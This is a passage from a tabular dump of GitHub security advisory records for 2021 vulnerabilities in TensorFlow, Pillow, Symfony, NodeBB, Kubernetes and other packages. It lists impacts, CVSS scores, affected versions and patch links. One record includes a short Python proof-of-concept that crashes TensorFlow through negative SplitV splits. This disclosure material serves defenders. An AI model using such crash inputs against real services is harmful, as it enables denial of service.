'ECOSYSTEM', 'events': [{'introduced': '1.0.0'}, {'fixed': '2.5.4'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/solidusio/solidus_auth_devise/security/advisories/GHSA-xm34-v85h-9pg2'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41274'}, {'type': 'WEB', 'url': 'https://github.com/solidusio/solidus_auth_devise/commit/731a6645e90ea9fd228f78ec53c6976c048a0555'}, {'type': 'WEB', 'url': 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/solidus_auth_devise/CVE-2021-41274.yml'}, {'type': 'PACKAGE', 'url': 'https://github.com/solidusio/solidus_auth_devise'}, {'type': 'WEB', 'url': 'https://github.com/solidusio/solidus_auth_devise/releases/tag/v2.5.4'}]","{'cwe_ids': ['CWE-352'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-11-17T19:57:48Z', 'nvd_published_at': '2021-11-17T20:15:00Z'}" +1.4.0,GHSA-cpf4-wx82-gxp6,2021-11-08T21:59:15Z,2021-11-10T18:48:15Z,,['CVE-2021-41222'],Segfault due to negative splits in `SplitV`,"### Impact +The [implementation](https://github.com/tensorflow/tensorflow/blob/e71b86d47f8bc1816bf54d7bddc4170e47670b97/tensorflow/core/kernels/split_v_op.cc#L49-L205) of `SplitV` can trigger a segfault is an attacker supplies negative arguments: + +```python +import tensorflow as tf + +tf.raw_ops.SplitV( + value=tf.constant([]), + size_splits=[-1, -2] + ,axis=0, + num_split=2) +``` + +This occurs whenever `size_splits` contains more than one value and at least one value is negative. + +### Patches +We have patched the issue in GitHub commit [25d622ffc432acc736b14ca3904177579e733cc6](https://github.com/tensorflow/tensorflow/commit/25d622ffc432acc736b14ca3904177579e733cc6). + +The fix will be included in TensorFlow 2.7.0. We will also cherrypick this commit on TensorFlow 2.6.1, TensorFlow 2.5.2, and TensorFlow 2.4.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by members of the Aivul Team from Qihoo 360.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-cpf4-wx82-gxp6'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41222'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/25d622ffc432acc736b14ca3904177579e733cc6'}, {'type': 'PACKAGE', 'url': 'https://github.com/tensorflow/tensorflow'}]","{'cwe_ids': ['CWE-682'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-08T21:59:15Z', 'nvd_published_at': '2021-11-05T23:15:00Z'}" +1.4.0,GHSA-fwf6-rw69-hhj4,2021-12-01T14:33:13Z,2021-11-30T22:22:16Z,,['CVE-2021-23654'],Improper Neutralization of Formula Elements in a CSV File in html-2-csv,"This affects all versions of package html-to-csv. When there is a formula embedded in a HTML page, it gets accepted without any validation and the same would be pushed while converting it into a CSV file. Through this a malicious actor can embed or generate a malicious link or execute commands via CSV files.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'html-to-csv'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.1.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-23654'}, {'type': 'WEB', 'url': 'https://github.com/hanwentao/html2csv/issues/9'}, {'type': 'PACKAGE', 'url': 'https://github.com/hanwentao/html2csv'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-PYTHON-HTMLTOCSV-1582784'}]","{'cwe_ids': ['CWE-1236'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-29T20:28:01Z', 'nvd_published_at': '2021-11-26T20:15:00Z'}" +1.4.0,GHSA-c8cw-2c5j-xff3,2021-11-22T19:05:51Z,2021-11-23T17:56:30Z,,['CVE-2021-39234'],Incorrect Authorization in Apache Ozone,"In Apache Ozone versions prior to 1.2.0, Authenticated users knowing the ID of an existing block can craft specific request allowing access those blocks, bypassing other security checks like ACL.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.ozone:ozone-main'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.2.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-39234'}, {'type': 'WEB', 'url': 'https://mail-archives.apache.org/mod_mbox/ozone-dev/202111.mbox/%3C97d65498-7f8c-366f-1bea-5a74b6378f0d%40apache.org%3E'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2021/11/19/5'}]","{'cwe_ids': ['CWE-863'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-22T19:05:51Z', 'nvd_published_at': '2021-11-19T10:15:00Z'}" +1.4.0,GHSA-qw36-p97w-vcqr,2021-12-01T14:36:09Z,2021-11-24T20:05:22Z,,['CVE-2021-41268'],Cookie persistence after password changes in symfony/security-bundle,"Description +----------- + +Since the rework of the Remember me cookie in Symfony 5.3, the cookie is not invalidated anymore when the user changes its password. + +Attackers can therefore maintain their access to the account even if the password is changed as long as they have had the chance to login once and get a valid remember me cookie. + +Resolution +---------- + +Symfony now makes the password part of the signature by default. In that way, when the password changes then the cookie is not valid anymore. + +The patch for this issue is available [here](https://github.com/symfony/symfony/commit/36a808b857cd3240244f4b224452fb1e70dc6dfc) for branch 5.3. + +Credits +------- + +We would like to thank Thibaut Decherit for reporting the issue and Wouter J for fixing the issue. +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'symfony/security-bundle'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.3.0'}, {'fixed': '5.3.12'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/symfony/symfony/security/advisories/GHSA-qw36-p97w-vcqr'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41268'}, {'type': 'WEB', 'url': 'https://github.com/symfony/symfony/pull/44243'}, {'type': 'WEB', 'url': 'https://github.com/symfony/symfony/commit/36a808b857cd3240244f4b224452fb1e70dc6dfc'}, {'type': 'PACKAGE', 'url': 'https://github.com/symfony/symfony'}, {'type': 'WEB', 'url': 'https://github.com/symfony/symfony/releases/tag/v5.3.12'}]","{'cwe_ids': ['CWE-384'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-24T20:00:03Z', 'nvd_published_at': '2021-11-24T19:15:00Z'}" +1.4.0,GHSA-77vh-xpmg-72qh,2021-11-24T19:43:35Z,2021-11-18T16:02:41Z,,[],Clarify `mediaType` handling,"### Impact +In the OCI Image Specification version 1.0.1 and prior, manifest and index documents are not self-describing and documents with a single digest could be interpreted as either a manifest or an index. + +### Patches +The Image Specification will be updated to recommend that both manifest and index documents contain a `mediaType` field to identify the type of document. +Release [v1.0.2](https://github.com/opencontainers/image-spec/releases/tag/v1.0.2) includes these updates. + +### Workarounds +Software attempting to deserialize an ambiguous document may reject the document if it contains both “manifests” and “layers” fields or “manifests” and “config” fields. + +### References +https://github.com/opencontainers/distribution-spec/security/advisories/GHSA-mc8v-mgrf-8f4m + +### For more information +If you have any questions or comments about this advisory: +* Open an issue in https://github.com/opencontainers/image-spec +* Email us at [security@opencontainers.org](mailto:security@opencontainers.org) +* https://github.com/opencontainers/image-spec/commits/v1.0.2 +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:N/I:L/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/opencontainers/image-spec'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/opencontainers/distribution-spec/security/advisories/GHSA-mc8v-mgrf-8f4m'}, {'type': 'WEB', 'url': 'https://github.com/opencontainers/image-spec/security/advisories/GHSA-77vh-xpmg-72qh'}, {'type': 'WEB', 'url': 'https://github.com/opencontainers/image-spec/commit/693428a734f5bab1a84bd2f990d92ef1111cd60c'}, {'type': 'PACKAGE', 'url': 'https://github.com/opencontainers/image-spec'}, {'type': 'WEB', 'url': 'https://github.com/opencontainers/image-spec/releases/tag/v1.0.2'}]","{'cwe_ids': ['CWE-843'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-11-17T23:13:41Z', 'nvd_published_at': None}" +1.4.0,GHSA-7g47-xxff-9p85,2021-10-13T17:28:16Z,2021-11-19T20:39:44Z,,['CVE-2021-41868'],Remote unauthenticated attackers able to upload files in Onionshare,OnionShare 2.3 before 2.4 allows remote unauthenticated attackers to upload files on a non-public node when using the --receive functionality. ,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'onionshare-cli'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3'}, {'fixed': '2.4'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41868'}, {'type': 'WEB', 'url': 'https://github.com/onionshare/onionshare/issues/1396'}, {'type': 'WEB', 'url': 'https://github.com/onionshare/onionshare/pull/1404'}, {'type': 'PACKAGE', 'url': 'https://github.com/onionshare/onionshare'}, {'type': 'WEB', 'url': 'https://www.ihteam.net/advisory/onionshare/'}]","{'cwe_ids': [], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-10-05T15:16:37Z', 'nvd_published_at': '2021-10-04T14:15:00Z'}" +1.4.0,GHSA-3xv8-3j54-hgrp,2023-09-05T09:18:07Z,2021-11-03T18:04:53Z,,['CVE-2020-10378'],Out-of-bounds read in Pillow,"In `libImaging/PcxDecode.c` in Pillow before 7.1.0, an out-of-bounds read can occur when reading PCX files where `state->shuffle` is instructed to read beyond `state->buffer`.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'Pillow'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '7.1.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-10378'}, {'type': 'WEB', 'url': 'https://github.com/python-pillow/Pillow/issues/4750'}, {'type': 'WEB', 'url': 'https://github.com/python-pillow/Pillow/pull/4538'}, {'type': 'WEB', 'url': 'https://github.com/python-pillow/Pillow/commit/6a83e4324738bb0452fbe8074a995b1c73f08de7#diff-9478f2787e3ae9668a15123b165c23ac'}, {'type': 'WEB', 'url': 'https://github.com/pypa/advisory-db/blob/7872b0a91b4d980f749e6d75a81f8cc1af32829f/vulns/pillow/PYSEC-2020-77.yaml'}, {'type': 'PACKAGE', 'url': 'https://github.com/python-pillow/Pillow'}, {'type': 'WEB', 'url': 'https://github.com/python-pillow/Pillow/commits/master/src/libImaging'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/BEBCPE4F2VHTIT6EZA2YZQZLPVDEBJGD/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HOKHNWV2VS5GESY7IBD237E7C6T3I427/'}, {'type': 'WEB', 'url': 'https://pillow.readthedocs.io/en/stable/releasenotes/6.2.3.html'}, {'type': 'WEB', 'url': 'https://pillow.readthedocs.io/en/stable/releasenotes/7.1.0.html'}, {'type': 'WEB', 'url': 'https://usn.ubuntu.com/4430-1/'}, {'type': 'WEB', 'url': 'https://usn.ubuntu.com/4430-2/'}]","{'cwe_ids': ['CWE-125'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-03T17:26:02Z', 'nvd_published_at': '2020-06-25T19:15:00Z'}" +1.4.0,GHSA-wmpv-c2jp-j2xg,2021-11-15T22:27:38Z,2021-11-15T23:28:18Z,,[],ERC1155Supply vulnerability in OpenZeppelin Contracts,"When ERC1155 tokens are minted, a callback is invoked on the receiver of those tokens, as required by the spec. When including the `ERC1155Supply` extension, total supply is not updated until after the callback, thus during the callback the reported total supply is lower than the real number of tokens in circulation. + +### Impact +If a system relies on accurately reported supply, an attacker may be able to mint tokens and invoke that system after receiving the token balance but before the supply is updated. + +### Patches +A fix is included in version 4.3.3 of `@openzeppelin/contracts` and `@openzeppelin/contracts-upgradeable`. + +### Workarounds +If accurate supply is relevant, do not mint tokens to untrusted receivers. + +### Credits +The issue was identified and reported by @ChainSecurityAudits. + +### For more information +Read [TotalSupply Inconsistency in ERC1155 NFT Tokens](https://medium.com/chainsecurity/totalsupply-inconsistency-in-erc1155-nft-tokens-8f8e3b29f5aa) by @ChainSecurityAudits for a more detailed breakdown. + +If you have any questions or comments about this advisory, email us at security@openzeppelin.com.",[],"[{'package': {'ecosystem': 'npm', 'name': '@openzeppelin/contracts'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.2.0'}, {'fixed': '4.3.3'}]}]}, {'package': {'ecosystem': 'npm', 'name': '@openzeppelin/contracts-upgradeable'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.2.0'}, {'fixed': '4.3.3'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/OpenZeppelin/openzeppelin-contracts/security/advisories/GHSA-wmpv-c2jp-j2xg'}, {'type': 'PACKAGE', 'url': 'https://github.com/OpenZeppelin/openzeppelin-contracts'}]","{'cwe_ids': [], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-11-15T22:27:38Z', 'nvd_published_at': None}" +1.4.0,GHSA-vf7h-6246-hm43,2021-11-18T21:49:46Z,2021-11-19T20:18:54Z,,['CVE-2021-39198'],The disqualify lead action may be executed without CSRF token check,"### Summary +The attacker is able to disqualify any Lead with a Cross-Site Request Forgery (CSRF) attack. + +### Workarounds +There are no workarounds that address this vulnerability. + +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:L/A:L'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'oro/crm'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.1.0'}, {'fixed': '4.1.17'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'oro/crm'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.2.0'}, {'fixed': '4.2.7'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/oroinc/crm/security/advisories/GHSA-vf7h-6246-hm43'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-39198'}, {'type': 'PACKAGE', 'url': 'https://github.com/oroinc/crm'}]","{'cwe_ids': ['CWE-352'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-18T21:49:46Z', 'nvd_published_at': '2021-11-19T22:15:00Z'}" +1.4.0,GHSA-hf2m-j98r-4fqw,2021-12-01T15:06:58Z,2021-11-30T22:21:05Z,,['CVE-2021-43786'],API token verification can be bypassed in NodeBB ,"### Impact +Incorrect logic present in the token verification step unintentionally allowed master token access to the API. + +### Patches +The vulnerability has been patch as of v1.18.5. + +### Workarounds +Cherry-pick commit hash 04dab1d550cdebf4c1567bca9a51f8b9ca48a500 to receive this patch in lieu of a full upgrade. + +### For more information +If you have any questions or comments about this advisory: +* Email us at [security@nodebb.org](mailto:security@nodebb.org) +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'nodebb'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.15.0'}, {'fixed': '1.18.5'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/NodeBB/NodeBB/security/advisories/GHSA-hf2m-j98r-4fqw'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-43786'}, {'type': 'WEB', 'url': 'https://github.com/NodeBB/NodeBB/commit/04dab1d550cdebf4c1567bca9a51f8b9ca48a500'}, {'type': 'WEB', 'url': 'https://blog.sonarsource.com/nodebb-remote-code-execution-with-one-shot/'}, {'type': 'PACKAGE', 'url': 'https://github.com/NodeBB/NodeBB'}, {'type': 'WEB', 'url': 'https://github.com/NodeBB/NodeBB/releases/tag/v1.18.5'}]","{'cwe_ids': ['CWE-287'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-11-30T14:35:05Z', 'nvd_published_at': '2021-11-29T20:15:00Z'}" +1.4.0,GHSA-p49h-hjvm-jg3h,2021-11-03T17:28:10Z,2021-11-03T18:05:04Z,,['CVE-2020-5312'],PCX P mode buffer overflow in Pillow,libImaging/PcxDecode.c in Pillow before 6.2.2 has a PCX P mode buffer overflow.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'Pillow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '6.2.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-5312'}, {'type': 'WEB', 'url': 'https://github.com/python-pillow/Pillow/commit/93b22b846e0269ee9594ff71a72bec02d2bea8fd'}, {'type': 'WEB', 'url': 'https://access.redhat.com/errata/RHSA-2020:0566'}, {'type': 'WEB', 'url': 'https://access.redhat.com/errata/RHSA-2020:0578'}, {'type': 'WEB', 'url': 'https://access.redhat.com/errata/RHSA-2020:0580'}, {'type': 'WEB', 'url': 'https://access.redhat.com/errata/RHSA-2020:0681'}, {'type': 'WEB', 'url': 'https://access.redhat.com/errata/RHSA-2020:0683'}, {'type': 'WEB', 'url': 'https://access.redhat.com/errata/RHSA-2020:0694'}, {'type': 'WEB', 'url': 'https://github.com/pypa/advisory-db/blob/7872b0a91b4d980f749e6d75a81f8cc1af32829f/vulns/pillow/PYSEC-2020-83.yaml'}, {'type': 'PACKAGE', 'url': 'https://github.com/python-pillow/Pillow'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/2MMU3WT2X64GS5WHDPKKC2WZA7UIIQ3A/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/3DUMIBUYGJRAVJCTFUWBRLVQKOUTVX5P/'}, {'type': 'WEB', 'url': 'https://pillow.readthedocs.io/en/stable/releasenotes/6.2.2.html'}, {'type': 'WEB', 'url': 'https://usn.ubuntu.com/4272-1/'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2020/dsa-4631'}]","{'cwe_ids': ['CWE-120'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-11-03T17:28:10Z', 'nvd_published_at': '2020-01-03T01:15:00Z'}" +1.4.0,GHSA-2r2v-q399-qq93,2021-11-10T19:44:31Z,2021-11-10T19:45:02Z,,['CVE-2021-22051'],Request injection in Spring Cloud Gateway,"Applications using Spring Cloud Gateway are vulnerable to specifically crafted requests that could make an extra request on downstream services. Users of affected versions should apply the following mitigation: 3.0.x users should upgrade to 3.0.5+, 2.2.x users should upgrade to 2.2.10.RELEASE or newer.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.springframework.cloud:spring-cloud-gateway'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.0.0'}, {'fixed': '3.0.5'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.springframework.cloud:spring-cloud-gateway'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.10.RELEASE0.5'}]}], 'database_specific': {'last_known_affected_version_range': '<= 2.2.10.RELEASE'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-22051'}, {'type': 'WEB', 'url': 'https://tanzu.vmware.com/security/cve-2021-22051'}]","{'cwe_ids': ['CWE-352', 'CWE-863'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-09T21:08:14Z', 'nvd_published_at': '2021-11-08T14:15:00Z'}" +1.4.0,GHSA-f5f7-6478-qm6p,2021-11-01T17:26:17Z,2021-11-01T17:32:28Z,,['CVE-2021-25741'],Files or Directories Accessible to External Parties in kubernetes,"A security issue was discovered in Kubernetes where a user may be able to create a container with subpath volume mounts to access files & directories outside of the volume, including on the host filesystem.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'k8s.io/kubernetes'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.19.15'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'k8s.io/kubernetes'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.20.0'}, {'fixed': '1.20.11'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'k8s.io/kubernetes'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.21.0'}, {'fixed': '1.21.5'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'k8s.io/kubernetes'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.22.0'}, {'fixed': '1.22.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/bottlerocket-os/bottlerocket/security/advisories/GHSA-f5f7-6478-qm6p'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-25741'}, {'type': 'WEB', 'url': 'https://github.com/kubernetes/kubernetes/issues/104980'}, {'type': 'PACKAGE', 'url': 'https://github.com/kubernetes/kubernetes'}, {'type': 'WEB', 'url': 'https://groups.google.com/g/kubernetes-security-announce/c/nyfdhK24H7s'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20211008-0006/'}]","{'cwe_ids': ['CWE-20', 'CWE-552'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-11-01T17:26:17Z', 'nvd_published_at': '2021-09-20T17:15:00Z'}" +1.4.0,GHSA-6mcm-j9cj-3vc3,2021-11-03T14:49:19Z,2021-11-03T17:30:35Z,,['CVE-2021-41973'],Infinite loop in Apache MINA,"In Apache MINA, a specifically crafted, malformed HTTP request may cause the HTTP Header decoder to loop indefinitely. The decoder assumed that the HTTP Header begins at the beginning of the buffer and loops if there is more data than expected. Please update MINA to 2.1.5 or greater.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.mina:mina-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.1.0'}, {'fixed': '2.1.5'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.mina:mina-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.0.22'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41973'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r0b907da9340d5ff4e6c1a4798ef4e79700a668657f27cca8a39e9250%40%3Cdev.mina.apache.org%3E'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuapr2022.html'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2021/11/01/2'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2021/11/01/8'}]","{'cwe_ids': ['CWE-835'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-02T19:48:48Z', 'nvd_published_at': '2021-11-01T09:15:00Z'}" +1.4.0,GHSA-m2v2-8227-59f5,2021-11-24T19:00:59Z,2021-11-23T17:54:39Z,,['CVE-2021-22967'],Exposure of sensitive information in concrete5/core,"In Concrete CMS (formerly concrete 5) below 8.5.7, IDOR Allows Unauthenticated User to Access Restricted Files If Allowed to Add Message to a Conversation.To remediate this, a check was added to verify a user has permissions to view files before attaching the files to a message in ""add / edit message”.",[],"[{'package': {'ecosystem': 'Packagist', 'name': 'concrete5/core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '8.5.7'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-22967'}, {'type': 'WEB', 'url': 'https://hackerone.com/reports/869612'}, {'type': 'WEB', 'url': 'https://documentation.concretecms.org/developers/introduction/version-history/857-release-notes'}]","{'cwe_ids': ['CWE-200', 'CWE-639'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-22T19:40:20Z', 'nvd_published_at': '2021-11-19T19:15:00Z'}" +1.4.0,GHSA-qgmg-gppg-76g5,2021-11-03T14:46:00Z,2021-11-03T17:34:45Z,,['CVE-2021-3765'],Inefficient Regular Expression Complexity in validator.js,validator.js prior to 13.7.0 is vulnerable to Inefficient Regular Expression Complexity,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'npm', 'name': 'validator'}, 'ecosystem_specific': {'affected_functions': ['validator.rtrim']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '13.7.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-3765'}, {'type': 'WEB', 'url': 'https://github.com/validatorjs/validator.js/commit/496fc8b2a7f5997acaaec33cc44d0b8dba5fb5e1'}, {'type': 'PACKAGE', 'url': 'https://github.com/validatorjs/validator.js'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/c37e975c-21a3-4c5f-9b57-04d63b28cfc9'}]","{'cwe_ids': ['CWE-1333'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-03T14:46:00Z', 'nvd_published_at': '2021-11-02T07:15:00Z'}" +1.4.0,GHSA-j3jw-j2j8-2wv9,2021-11-15T14:43:39Z,2021-11-10T20:58:03Z,,['CVE-2021-43569'],Improper Verification of Cryptographic Signature in starkbank-ecdsa,"The verify function in the Stark Bank .NET ECDSA library (ecdsa-dotnet) 1.3.1 fails to check that the signature is non-zero, which allows attackers to forge signatures on arbitrary messages.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'NuGet', 'name': 'starkbank-ecdsa'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.3.2'}]}]}]","[{'type': 'ADVISORY', 'url': 